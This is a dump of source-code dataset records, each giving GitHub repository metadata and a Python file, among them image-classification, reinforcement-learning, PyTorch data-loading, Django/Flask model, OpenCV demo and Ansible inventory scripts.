# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
|
[
"[email protected]"
] | |
50509f1fcaee6a8db649657d24ee5a29044b19e6
|
6932a9ae700a623f16a3aef417d0598cf6d4f389
|
/karasu_speak.py
|
c8c028b30786e6c5b67abc979a0d40f60e63f06a
|
[
"MIT"
] |
permissive
|
MuAuan/hirakegoma
|
9f1a252d913749a2c16ae5bd7a8870550048d26d
|
861879af1016c25b7a14bcabe543bfba47fd57f3
|
refs/heads/master
| 2020-04-27T20:12:25.315594 | 2019-03-24T12:38:30 | 2019-03-24T12:38:30 | 174,649,241 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,935 |
py
|
# -*- coding: utf-8 -*-
import cv2
import pyaudio
import sys
import time
import wave
import pydub
from pydub import AudioSegment
import moviepy.editor as mp
import datetime
import os
from vgg16_like import model_family_cnn
from keras.preprocessing import image
import matplotlib.pyplot as plt
import keras
import numpy as np
def prediction(imgSrc,model):
#np.random.seed(1337) # for reproducibility
img_rows,img_cols=128, 128
img = np.array(imgSrc)
img = img.reshape(1, img_rows,img_cols,3)
img = img.astype('float32')
img /= 255
t0=time.time()
y_pred = model.predict(img)
return y_pred
def karasu_responder(model,path,img_rows,img_cols):
imgSrc=[]
#for j in range(0,100000,1):
# j += 1
imgSrc = image.load_img(path, target_size=(img_rows,img_cols))
#plt.imshow(imgSrc)
#plt.pause(1)
#plt.close()
pred = prediction(imgSrc,model)
#print(pred[0])
if pred[0][0]>=0.5:
filename = "karasu-miyama_out1.wav"
print("angry")
elif pred[0][1]>=0.5:
#filename = "karasu_kero_out3.wav"
filename = "karasu-normal_out1.wav"
print("normal")
elif pred[0][2]>=0.5:
#filename = "karasu_kero_out1.wav"
filename = "karasu-others_out1.wav" #karasu-hageshii_out.wav
print("others")
return filename
num_classes = 3
img_rows,img_cols=128, 128
input_shape = (img_rows,img_cols,3)
model = model_family_cnn(input_shape, num_classes = num_classes)
# load the weights from the last epoch
model.load_weights('params_karasu-0angry-1normal-2others.hdf5', by_name=True)
print('Model loaded.')
path = "./out_test/figure.jpg"
img_rows,img_cols=128,128
s=0
while True:
if os.path.exists(path)==True:
s += 1
for j in range(0,50000000,1):
j += 1
"""
if s%3 == 0:
path="./out_test/figure_angry.jpg"
elif s%3 == 1:
path="./out_test/figure_normal.jpg"
else:
path="./out_test/figure_others.jpg"
"""
filename=karasu_responder(model,path,img_rows,img_cols)
wf = wave.open(filename, "rb")
# チャンク数を指定
CHUNK1 = 1024
#filename = "hirakegoma.wav"
wf = wave.open(filename, "rb")
# PyAudioのインスタンスを生成
p1 = pyaudio.PyAudio()
# Streamを生成
stream1 = p1.open(format=p1.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# データを1度に1024個読み取る
input1 = wf.readframes(CHUNK1)
# 実行
while stream1.is_active():
output = stream1.write(input1)
input1 = wf.readframes(CHUNK1)
if input1==b'':
os.remove(path)
break
|
[
"[email protected]"
] | |
c05ac1332910c7ae7901500da72f4923b5fc4770
|
15646d66d4452a4efa927d53dc687d78c5201ece
|
/code/datasets.py
|
e8528356752b7f77b481e2a75d2d9e7a9ea82620
|
[] |
no_license
|
wjtoth/co759-project
|
0461ba86c7e76fa90af5fb3a08af2128189de06b
|
aae54cd76a2c4c3cb84cc607625d94036a45b1a5
|
refs/heads/master
| 2021-01-25T10:06:21.818503 | 2018-11-26T20:12:18 | 2018-11-26T20:12:18 | 123,339,356 | 1 | 0 | null | 2018-04-24T19:57:57 | 2018-02-28T20:35:20 |
Python
|
UTF-8
|
Python
| false | false | 11,924 |
py
|
import os
import logging
from functools import partial
from copy import deepcopy
import torch
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
from util.partialdataset import validation_split
from util.concatdataset import ConcatDataset
from util.datasetindexingwrapper import DatasetIndexingWrapper
def create_datasets(ds_name, batch_size, test_batch_size, do_aug, no_val_set, data_root,
use_cuda, seed, num_workers, dbg_ds_size, allow_download):
ds_name = ds_name.lower()
# ----- set up specified dataset -----
if ds_name == 'mnist':
mean_std = ((0.1307,), (0.3081,))
ds = datasets.MNIST
create_ds_func = partial(create_mnist_cifar_datasets, ds=ds, download=allow_download, val_pct=1.0/6.0,
data_dir='data/' + ds_name)
num_classes = 10
elif ds_name == 'cifar10':
mean_std = ((0.49139968, 0.48215841, 0.44653091), (0.24703223, 0.24348513, 0.26158784))
ds = datasets.CIFAR10
create_ds_func = partial(create_mnist_cifar_datasets, ds=ds, download=allow_download, val_pct=0.2,
data_dir='data/' + ds_name)
num_classes = 10
elif ds_name == 'cifar100':
# mean_std = ((0.49139968, 0.48215841, 0.44653091), (0.24703223, 0.24348513, 0.26158784))
mean_std = ((129.30416561 / 255, 124.0699627 / 255, 112.43405006 / 255),
(68.1702429 / 255, 65.39180804 / 255, 70.41837019 / 255))
ds = datasets.CIFAR100
create_ds_func = partial(create_mnist_cifar_datasets, ds=ds, download=allow_download, val_pct=0.2,
data_dir='data/' + ds_name)
num_classes = 100
elif ds_name == 'svhn':
mean_std = ((0.4309, 0.4302, 0.4463), (0.1965, 0.1983, 0.1994))
create_ds_func = partial(create_svhn_datasets, download=allow_download, val_pct=0.1, data_dir='data/' + ds_name)
num_classes = 10
elif ds_name == 'imagenet':
mean_std = ((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
root_dir = '/media/ssdpro/data/imagenet/ilsvrc14_256_ims' if not data_root else data_root
create_ds_func = partial(create_imagenet_datasets, data_root_dir=root_dir)
num_classes = 1000
else:
raise NotImplementedError("'{}' dataset is not supported".format(ds_name))
train_loader, val_loader, test_loader = \
create_ds_func(batch_size, use_cuda, seed, mean_std=mean_std, do_aug=do_aug,
create_val=not no_val_set, num_workers=num_workers, test_batch_size=test_batch_size,
dbg_ds_size=dbg_ds_size)
return train_loader, val_loader, test_loader, num_classes
def create_mnist_cifar_datasets(batch_size, use_cuda, seed, ds=None, mean_std=None, val_pct=0.1, data_dir='',
download=False, test_batch_size=None, do_aug=False, create_val=True,
num_workers=2, dbg_ds_size=0):
kwargs = {}
if seed != -1:
torch.manual_seed(seed)
if use_cuda:
if seed != -1:
torch.cuda.manual_seed(seed)
kwargs = {'num_workers': num_workers, 'pin_memory': True}
if mean_std is None:
train_set = ds(data_dir, train=True, download=download, transform=transforms.ToTensor())
mu = train_set.train_data.mean(axis=(0, 1, 2)) / 255
sig = train_set.train_data.std(axis=(0, 1, 2)) / 255
mean_std = (mu, sig)
print('train_data shape:', train_set.train_data.size(), 'mean:', mean_std[0], 'std:', mean_std[1])
del train_set
train_transforms = [transforms.ToTensor(),
transforms.Normalize(mean_std[0], mean_std[1])]
test_transforms = deepcopy(train_transforms)
if do_aug:
train_transforms = [transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()] + train_transforms
train_ds = ds(data_dir, train=True, download=download, transform=transforms.Compose(train_transforms))
if create_val:
total_len = len(train_ds)
val_ds = ds(data_dir, train=True, download=False, transform=transforms.Compose(test_transforms))
train_ds, _ = validation_split(train_ds, val_share=val_pct)
_, val_ds = validation_split(val_ds, val_share=val_pct)
assert len(train_ds) + len(val_ds) == total_len
else:
val_ds = None
test_ds = ds(data_dir, train=False, download=download, transform=transforms.Compose(test_transforms))
if test_batch_size is None or test_batch_size == 0:
test_batch_size = batch_size
if dbg_ds_size > 0:
train_ds, _ = validation_split(train_ds, val_share=(1.0 - float(dbg_ds_size) / len(train_ds)))
logging.debug('DEBUG: setting train dataset size = {}'.format(len(train_ds)))
train_ds = DatasetIndexingWrapper(train_ds)
train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=True, **kwargs)
# train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=False, **kwargs) # TODO: REMOVE THIS
val_loader = DataLoader(val_ds, batch_size=test_batch_size, shuffle=False, **kwargs) if create_val else None
test_loader = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False, **kwargs)
return train_loader, val_loader, test_loader
def create_svhn_datasets(batch_size, use_cuda, seed, mean_std=None, val_pct=0.1, data_dir='', download=False,
test_batch_size=None, do_aug=False, create_val=True, num_workers=2, dbg_ds_size=0):
kwargs = {}
if seed != -1:
torch.manual_seed(seed)
if use_cuda:
if seed != -1:
torch.cuda.manual_seed(seed)
kwargs = {'num_workers': num_workers, 'pin_memory': True}
if mean_std is None:
logging.info('computing mean and std of SVHN dataset -- pre-specify these to improve performance')
train_data = datasets.SVHN(data_dir, split='train', download=download, transform=transforms.ToTensor())
extra_data = datasets.SVHN(data_dir, split='extra', download=download, transform=transforms.ToTensor())
train_set = ConcatDataset([train_data, extra_data], shuffle=False)
mean, std = compute_mean_std_per_channel(train_set)
mean_std = (mean, std)
print('train_data shape: {}x{}'.format(len(train_set), train_set[0][0].size()), 'mean:', mean, 'std:', std)
del train_set, extra_data
base_transforms = [transforms.Resize((40, 40)),
transforms.ToTensor(),
transforms.Normalize(mean_std[0], mean_std[1])]
# if do_aug:
# train_transforms = [transforms.RandomCrop(32, padding=4),
# transforms.RandomHorizontalFlip()] + deepcopy(base_transforms)
# assert not do_aug, 'data augmentation not supported for SVHN'
train_transforms = transforms.Compose(deepcopy(base_transforms))
test_transforms = transforms.Compose(base_transforms)
train_ds = ConcatDataset([datasets.SVHN(data_dir, split='train', download=download, transform=train_transforms),
datasets.SVHN(data_dir, split='extra', download=download, transform=train_transforms)])
if create_val:
val_ds = ConcatDataset([datasets.SVHN(data_dir, split='train', download=False, transform=test_transforms),
datasets.SVHN(data_dir, split='extra', download=False, transform=test_transforms)])
train_ds, _ = validation_split(train_ds, val_share=val_pct, shuffle_data=True)
_, val_ds = validation_split(val_ds, val_share=val_pct, shuffle_data=train_ds.index_mapping)
else:
val_ds = None
test_ds = datasets.SVHN(data_dir, split='test', download=download, transform=test_transforms)
if test_batch_size is None or test_batch_size == 0:
test_batch_size = batch_size
if dbg_ds_size > 0:
train_ds, _ = validation_split(train_ds, val_share=(1.0 - float(dbg_ds_size) / len(train_ds)))
logging.debug('DEBUG: setting train dataset size = {}'.format(len(train_ds)))
train_ds = DatasetIndexingWrapper(train_ds)
train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=True, **kwargs)
val_loader = DataLoader(val_ds, batch_size=test_batch_size, shuffle=False, **kwargs) if create_val else None
test_loader = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False, **kwargs)
return train_loader, val_loader, test_loader
def create_imagenet_datasets(batch_size, use_cuda, seed, mean_std=None, data_root_dir='', test_batch_size=None,
create_val=True, do_aug=True, num_workers=2, dbg_ds_size=0):
kwargs = {}
if seed != -1:
torch.manual_seed(seed)
if use_cuda:
if seed != -1:
torch.cuda.manual_seed(seed)
kwargs = {'num_workers': num_workers, 'pin_memory': True}
assert mean_std is not None, 'cannot compute mean_std on imagenet, must specify it beforehand'
# note: this assumes that ImageNet images have already been resized to have short edge = 256 when loaded
base_transforms = [transforms.ToTensor(),
transforms.Normalize(mean_std[0], mean_std[1])]
# train transforms = random crop to 224, horizontal flip, normalize mean and stddev
train_transforms = [] if not do_aug else [transforms.RandomCrop(224, 0),
transforms.RandomHorizontalFlip()]
train_transforms = train_transforms + deepcopy(base_transforms)
# test transforms = center crop, normalize mean and stddev
test_transforms = [transforms.CenterCrop(224)] + base_transforms
train_dir = os.path.join(data_root_dir, 'train')
val_dir = os.path.join(data_root_dir, 'val')
train_ds = datasets.ImageFolder(train_dir, transform=transforms.Compose(train_transforms))
if create_val:
val_pct = 0.1
val_ds = datasets.ImageFolder(train_dir, transform=transforms.Compose(test_transforms))
train_ds, _ = validation_split(train_ds, val_share=val_pct, shuffle_data=True)
_, val_ds = validation_split(val_ds, val_share=val_pct, shuffle_data=train_ds.index_mapping)
else:
val_ds = None
test_ds = datasets.ImageFolder(val_dir, transform=transforms.Compose(test_transforms))
# test_ds = datasets.ImageFolder(data_root_dir+'/test', transform=transforms.Compose(test_transforms))
if dbg_ds_size > 0:
train_ds, = validation_split(train_ds, val_share=(1.0 - float(dbg_ds_size) / len(train_ds)))
logging.warning('DEBUG: setting train dataset size = {}'.format(len(train_ds)))
train_ds = DatasetIndexingWrapper(train_ds)
if test_batch_size is None or test_batch_size == 0:
test_batch_size = batch_size
train_loader = DataLoader(train_ds, batch_size=batch_size, shuffle=True, **kwargs)
val_loader = DataLoader(val_ds, batch_size=test_batch_size, shuffle=False, **kwargs) if create_val else None
test_loader = DataLoader(test_ds, batch_size=test_batch_size, shuffle=False, **kwargs)
return train_loader, val_loader, test_loader
def compute_mean_std_per_channel(dataset):
assert len(dataset) > 0
assert dataset[0][0].dim() == 3, 'dataset has {} dimensions, but needs 3'.format(dataset[0][0].dim())
imsize = dataset[0][0].size()
sum1, sum2, count = torch.FloatTensor(imsize[0]).zero_(), torch.FloatTensor(imsize[0]).zero_(), 0
# lazy two-pass version
for i in range(len(dataset)):
img = dataset[i][0]
count += img.numel() / img.size(0)
sum1 += img.sum(dim=2).sum(dim=1)
mean = sum1 / count
mus = mean.unsqueeze(1).unsqueeze(2)
for i in range(len(dataset)):
img = dataset[i][0]
sum2 += ((img - mus) * (img - mus)).sum(dim=2).sum(dim=1)
std = torch.sqrt(sum2 / (count - 1))
return mean, std
|
[
"[email protected]"
] | |
b78e6bea6c9302563091f707c926e77f8c3a6ec1
|
7737fd9eacc1a8b8d8b14a3ebca4e86c174ff8b4
|
/gist/cuatro.py
|
54ec61ec1642f72076b989fa7e82c510f366d92c
|
[] |
no_license
|
davidgjordan/gym_tensorflow
|
e82a021ee329e8f6430ff52e6ec36444e842dcec
|
d97070cfd8079356c77f079d821c0ba5aebcaabc
|
refs/heads/master
| 2018-09-23T17:16:20.968122 | 2018-06-27T18:55:00 | 2018-06-27T18:55:00 | 117,039,839 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,149 |
py
|
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import numpy as np
import gym
from keras.models import Model
from keras.layers import Input, Dense, BatchNormalization, PReLU, Dropout
from keras.regularizers import l2
from keras.optimizers import RMSprop
from keras.engine import Layer
from keras import backend as K
env_name = 'Breakout-ram-v0'
_actions = (1, 4, 5)
def main():
env = gym.make(env_name)
#env = gym.wrappers.Monitor(env, env_name + '_history')
n_max_episode = 10000
play_length = 2**30
warmingup_episode = 100
memory_length = 1024 * 256
gamma = 0.99
epsilon = 1.0
epsilon_decay = 0.998
epsilon_min = 0.1
learning_rate = 0.0001
n_units = (128 * 8, 1024, 1024, len(_actions))
agent = Agent(n_units, learning_rate, gamma, memory_length)
for n_episode in range(n_max_episode):
play(env, agent, play_length, epsilon)
agent.train()
if n_episode > warmingup_episode:
epsilon = (epsilon - epsilon_min) * epsilon_decay + epsilon_min
env.close()
def play(env, agent, play_length, epsilon=0):
total_reward = 0.0
observation = env.reset()
ss = preprocess(observation)
for n_frame in range(play_length):
s = ss
if n_frame < 20 or np.random.uniform() < epsilon:
action = np.random.choice(len(_actions))
else:
action = agent.predict(s)
observation, reward, done, info = env.step(_actions[action])
total_reward += reward
ss = preprocess(observation)
agent.memory_append((s, action, np.sign(reward), done, ss))
if done:
break
return total_reward
def preprocess(x):
return np.asarray([(n >> i) & 1 for n in x for i in range(8)], dtype=np.bool)
class Agent(object):
def __init__(self, n_units, sgd_lr, gamma, memory_length):
nD, nV = n_units[0], n_units[-1]
Wreg_l2 = 1e-6
drop_proba = 0.2
self.gamma = gamma
self.train_batch_size = 128
self.mem = PlayMemory(memory_length, nD)
self.train_count = 0
s = Input(shape=(nD,))
a = Input(shape=(1,), dtype='uint8')
z = s
for nH in n_units[1:-1]:
z = Dense(nH, W_regularizer=l2(Wreg_l2))(z)
z = BatchNormalization()(z)
z = PReLU()(z)
z = Dropout(drop_proba)(z)
z = Dense(nV + 1, W_regularizer=l2(Wreg_l2), init='zero')(z)
self.Q_model = Model(input=s, output=DuelQ()(z))
self.train_model = Model(input=[s, a], output=DuelQa()([z, a]))
self.train_model.compile(
loss=lambda y_true, y_pred: K.sqrt((y_true - y_pred)**2 + 1) - 1,
optimizer=RMSprop(lr=sgd_lr))
def train(self):
m = self.mem
n = len(m)
if n < 16384 or m.add_count < 1024:
return
m.add_count = 0
self.train_count += 1
for i in range(0, n, self.train_batch_size):
j = i + self.train_batch_size
m.Q[i:j] += self.gamma * np.max(self.Q_model.predict_on_batch(
m.S[i:j, 1]), axis=1, keepdims=True) * (m.T[i:j] == False)
m.Q[i:j] /= 2
idx = np.random.permutation(n)
for n in range(self.train_batch_size, n, self.train_batch_size):
i = idx[n - self.train_batch_size:n]
self.train_model.train_on_batch(
[m.S[i, 0], m.A[i]], m.R[i] + m.Q[i])
def predict(self, s):
return np.argmax(self.Q_model.predict_on_batch(s[np.newaxis]).squeeze())
def memory_append(self, sars):
self.mem.append(sars)
class DuelQ(Layer):
def get_output_shape_for(self, input_shape):
return None, input_shape[1] - 1
def call(self, x, mask=None):
return K.expand_dims(x[:, -1] - K.mean(x[:, :-1], axis=1)) + x[:, :-1]
class DuelQa(Layer):
def get_output_shape_for(self, input_shape):
return None, 1
def call(self, z, mask=None):
x, a = z
return K.expand_dims(x[:, -1] - K.mean(x[:, :-1], axis=1) + x[K.arange(x.shape[0]), K.flatten(a)])
class PlayMemory(object):
def __init__(self, length, s_size):
self.max_length = length
self.S = np.zeros((self.max_length, 2, s_size), dtype=np.bool)
self.A = np.zeros((self.max_length, 1), dtype=np.int8)
self.R = np.zeros((self.max_length, 1), dtype=np.float32)
self.T = np.zeros((self.max_length, 1), dtype=np.bool)
self.Q = np.zeros((self.max_length, 1), dtype=np.float32)
self.length = 0
self.add_count = 0
self._i = self._rand_index()
def __len__(self):
return self.length
def _rand_index(self):
for i in range(self.max_length):
self.length = i + 1
yield i
while True:
for i in np.random.permutation(self.max_length):
yield i
def append(self, sars):
(s, a, r, t, ss) = sars
i = next(self._i)
self.S[i, 0] = s
self.S[i, 1] = ss
self.A[i] = a
self.R[i] = r
self.T[i] = t
self.Q[i] = 0
self.add_count += 1
main()
|
[
"[email protected]"
] | |
34179ff136b9b68223fd42cb9f5fbe54e95a88de
|
af0dcf80a36da4ac6894dc517ad1870f702c3122
|
/azure-mgmt-web/azure/mgmt/web/models/csm_publishing_profile_options.py
|
99b9542ab7d50b0a1d29b9d31f8743561ff5afa3
|
[
"Apache-2.0"
] |
permissive
|
FlavioAlexander/azure-sdk-for-python
|
4c6151ca17886f9e4d47e1ccc469859abdedca5a
|
8c7416749f9a5697e0311bc9af8fe5c0d524ca03
|
refs/heads/master
| 2021-01-24T02:34:37.194767 | 2016-07-03T23:47:23 | 2016-07-03T23:47:23 | 62,738,173 | 0 | 1 | null | 2016-07-06T16:54:12 | 2016-07-06T16:54:10 | null |
UTF-8
|
Python
| false | false | 1,346 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CsmPublishingProfileOptions(Model):
"""Publishing options for requested profile.
:param format: Name of the format. Valid values are:
FileZilla3
WebDeploy -- default
Ftp
:type format: str
"""
_attribute_map = {
'format': {'key': 'format', 'type': 'str'},
}
def __init__(self, format=None):
self.format = format
|
[
"[email protected]"
] | |
d0bbe41af3a825c8397a6ae8f3261c2be29c4625
|
15960f0aa40915ddc93cd5c8a840a4abfb167cf1
|
/groups/models.py
|
0fae1fa57df655ee1187afa7e7aea983641ef30c
|
[] |
no_license
|
phouse512/piper
|
74d815fd443482abc80418dbed678b1431e17eb9
|
70f651db8af4edb625f6ba249556d3c2d04a350b
|
refs/heads/master
| 2022-05-04T20:36:56.354336 | 2018-12-19T04:28:23 | 2018-12-19T04:28:23 | 40,972,739 | 0 | 0 | null | 2018-11-17T16:56:21 | 2015-08-18T13:13:15 |
Python
|
UTF-8
|
Python
| false | false | 399 |
py
|
from django.db import models
from users.models import User
class Group(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=30)
class Meta:
db_table = 'groups'
class GroupMembership(models.Model):
id = models.AutoField(primary_key=True)
user = models.ForeignKey(User)
group = models.ForeignKey(Group)
class Meta:
db_table = 'groups_membership'
|
[
"[email protected]"
] | |
ff394e97747dd634f04822bfb6ae50e11a289760
|
ecf33e849afc7379070b7e088f957536b5736b50
|
/models/user.py
|
66c53ddc7b45c5ffa7d234b27b28b5e87340f616
|
[] |
no_license
|
AhmedKaramDev/FlaskRESTful_API
|
e5eeb7af05ca5b75937b577959f9f0e5262e92b4
|
cde3fb9178382d56da4bcec38414489209f9e171
|
refs/heads/master
| 2020-06-01T22:15:00.477844 | 2019-06-09T14:22:15 | 2019-06-09T14:22:15 | 190,947,279 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,599 |
py
|
import sqlite3
from db import db
class UserModel(db.Model):
    """SQLAlchemy model for a user account (table ``users``).

    The old commented-out raw-sqlite3 implementations of the finders were
    dead code superseded by the SQLAlchemy queries and have been removed.
    """
    __tablename__ = 'users'

    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80))
    # NOTE(review): stored as received — confirm hashing happens upstream.
    password = db.Column(db.String(80))

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def save_to_db(self):
        """Add this user to the current session and commit."""
        db.session.add(self)
        db.session.commit()

    @classmethod
    def find_by_username(cls, username):
        """Return the first user with the given username, or None."""
        return cls.query.filter_by(username=username).first()

    @classmethod
    def find_by_id(cls, _id):
        """Return the user with the given primary key, or None."""
        return cls.query.filter_by(id=_id).first()
|
[
"[email protected]"
] | |
14deabd526b83ff7e8fd5d52399cd3b61b61d267
|
dbce052f7322614fd4766e77139df5b7ca5c2908
|
/Previous OpenCV projects/border_opencv_logo.py
|
8883a3d238541486c85dda8f78e79d795c72e0e8
|
[
"MIT"
] |
permissive
|
dmiruke/Python-Pyimagesearch-IP
|
d0afb8930f1469f594bef885cbdef96a08d34f1f
|
e590bc7959cd062f9fe670f4249373f175c321b9
|
refs/heads/master
| 2022-02-19T17:22:29.246188 | 2019-09-30T21:05:58 | 2019-09-30T21:05:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 980 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 19 16:29:26 2017
# Successful
@author: Rukayat Ariori

Demonstrates the cv2.copyMakeBorder border modes on the OpenCV logo image
and shows all variants side by side in a 2x3 matplotlib grid.
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt

BLUE = [255,0,0]  # border color for the constant-border variant (OpenCV uses BGR order)

img1 = cv2.imread('opencv_logo.jpg')

# One image per border mode, each padded by 10 px on every side.
replicate = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_REPLICATE)
reflect = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_REFLECT)
reflect101 = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_REFLECT_101)
wrap = cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_WRAP)
constant= cv2.copyMakeBorder(img1,10,10,10,10,cv2.BORDER_CONSTANT,value=BLUE)

# 2x3 grid: original plus the five padded variants.
plt.subplot(231),plt.imshow(img1,'gray'),plt.title('ORIGINAL')
plt.subplot(232),plt.imshow(replicate,'gray'),plt.title('REPLICATE')
plt.subplot(233),plt.imshow(reflect,'gray'),plt.title('REFLECT')
plt.subplot(234),plt.imshow(reflect101,'gray'),plt.title('REFLECT_101')
plt.subplot(235),plt.imshow(wrap,'gray'),plt.title('WRAP')
plt.subplot(236),plt.imshow(constant,'gray'),plt.title('CONSTANT')
plt.show()
|
[
"[email protected]"
] | |
45c337f0ce82f23dcbacf2c49c590c23ac755887
|
789807122804d53b6855634ce86514f39c9bee13
|
/Remove_Duplicates_from_Sorted_List,py.py
|
bc4082922948f0f36630aa14039d8b4454dafc04
|
[] |
no_license
|
LRegan666/Athene_Leetcode
|
0da1490823b59f6ec59884f169709f376ea2c9ee
|
f621842bc8ce3c068b3279302e6de6ce484610a6
|
refs/heads/master
| 2020-04-15T02:07:05.574524 | 2019-02-23T11:13:20 | 2019-02-23T11:13:20 | 164,303,620 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 516 |
py
|
class Solution:
def deleteDuplicates(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head:
return head
phead = head
prev_val = phead.val
while phead.next:
next_node = phead.next
next_val = next_node.val
if next_val == prev_val:
phead.next = next_node.next
else:
prev_val = next_val
phead = phead.next
return head
|
[
"[email protected]"
] | |
e153ba4d070ed7888466798b57dcc853f7ee5ee9
|
c8580191b571a4081fd2b1df9a73a890640a9778
|
/report_generator/__main__.py
|
80645c2de9f0b394bbb7cfa0841b729536e946f0
|
[] |
no_license
|
yanivfgl/UBCHelios
|
b0f08b99a505e79a800c56e9809768832cb71498
|
9f56765c199340959ba3ec81b81e16b811435af4
|
refs/heads/master
| 2020-07-14T01:56:49.320669 | 2019-08-29T00:56:59 | 2019-08-29T00:56:59 | 205,206,643 | 1 | 0 | null | 2019-08-29T16:34:11 | 2019-08-29T16:34:10 | null |
UTF-8
|
Python
| false | false | 1,696 |
py
|
import constants_rev as cs
import functions as fn
import si_formatter as si

# Banner printed when the module is imported/run.
print("Welcome to Mars Colony::Project HELIOS Calculations")
def print_report(revenue_desired=cs.REVENUE_DESIRED):
    """
    Print the He-3 mining report for a desired revenue figure.

    :param revenue_desired: target revenue in dollars
    :return: None — all results are printed to stdout
    """
    # Energy released by fusing one mole (~3 g) of He-3.
    print("%s of energy per 3g He-3" % si.return_with_si(fn.energy_from_mass_he3(cs.He3_MOLAR_MASS), 'J'))

    print("\nFor $ %s" % "{:,} in revenue:".format(revenue_desired))
    energy_required = fn.energy_needed_for_revenue(revenue_desired)
    print(" %s of energy required" % si.return_with_si(energy_required, 'J'))
    he3_mass = fn.mass_he3_required_for_energy(energy_required)
    print(" %s of mass of He3 required" % si.return_with_si(he3_mass, 'g'))
    regolith_mass = fn.mass_regolith_to_retrieve_mass_he3(he3_mass)
    print(" %s of mass of regolith required" % si.return_with_si(regolith_mass, 'g'))
    print(" Rate per day of %s [D+N]" %
          si.return_with_si(regolith_mass / cs.DAYS_IN_YEAR, 'g'))
    # Day-only operation mines the same yearly total in half the time.
    print(" Rate per day of %s [D only]" %
          si.return_with_si(2 * regolith_mass / cs.DAYS_IN_YEAR, 'g'))

    print("Volatiles Generated: ")
    # BUG FIX: the loop previously iterated cs.volatile_he3_ratio but indexed
    # cs.VOLATILE_He3_RATIO — two differently-cased names for what should be
    # one mapping.  Iterating the same mapping that is indexed guarantees the
    # keys always resolve.  (Confirm cs defines the uppercase name.)
    for volatile in cs.VOLATILE_He3_RATIO:
        print(" %s of" % si.return_with_si(he3_mass * cs.VOLATILE_He3_RATIO[volatile], 'g'), volatile)
# print("%s of regolith per ton He-3" %
#      return_with_si_units(affix_si_prefix(mass_regolith_to_retrieve_mass_he3(ONE_TON)), 'g')) # Mass in grams

# Run the full report for one billion dollars of desired revenue.
print_report(1e9)  # one billion dollars
# Find energy required to create desired revenue
# Find mass of He3 in g to create needed amount of energy
[
"[email protected]"
] | |
448647d2a2227132ad85b2902a4bbbd3b2d42474
|
399b69613df1700d19a0e803fe47fd8cbad365f7
|
/myansible/ansicfg/dhosts.py
|
a7030278867a479925cdec27a62abed9fd9ecd6c
|
[] |
no_license
|
hraa0101/python
|
13d05e6fc6ab40185d317f05e5ff520647437b59
|
5d16ff9b1599d3cba4386ef0cc7bea9a9de5c58f
|
refs/heads/master
| 2020-03-26T15:37:31.038126 | 2018-10-05T01:53:19 | 2018-10-05T01:53:19 | 145,054,373 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,327 |
py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
#from __future__ import unicode_literals
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Date, ForeignKey
from sqlalchemy.orm import sessionmaker
import json
# Engine pointing at the Django project's sqlite database file (absolute path
# contains a localized directory name; utf8 matches it).
engine = create_engine(
    'sqlite:////root/桌面/ansible_project/myansible/db.sqlite3',
    encoding='utf8'
)
Base = declarative_base()
# Session factory bound to the engine; a session is created in __main__ below.
Session = sessionmaker(bind=engine)
class Group(Base):
    """ORM mapping of the Django app's webansi_group table (host groups)."""
    __tablename__ = 'webansi_group'
    id = Column(Integer, primary_key=True)
    hostgroup = Column(String(50))
    def __str__(self):
        return self.hostgroup
class Host(Base):
    """ORM mapping of the Django app's webansi_host table (managed hosts)."""
    __tablename__ = 'webansi_host'
    id = Column(Integer, primary_key=True)
    hostname = Column(String(50))
    ipaddr = Column(String(15))
    # Foreign key into webansi_group; joined against Group.id in __main__.
    group_id = Column(Integer, ForeignKey('webansi_group.id'))
if __name__ == '__main__':
    # Emit an Ansible dynamic-inventory JSON document of the form
    # {"<group>": {"hosts": ["<ip>", ...]}, ...}.
    session = Session()
    qset = session.query(Group.hostgroup, Host.ipaddr).\
        join(Host, Group.id==Host.group_id)
    hosts = qset.all()
    result = {}
    # e.g. [(u'webservers', u'192.168.4.2'), (u'webservers', u'192.168.4.3')]
    for group, ip in hosts:
        if group not in result:
            result[group] = {'hosts': []}
        result[group]['hosts'].append(ip)
    print(json.dumps(result))
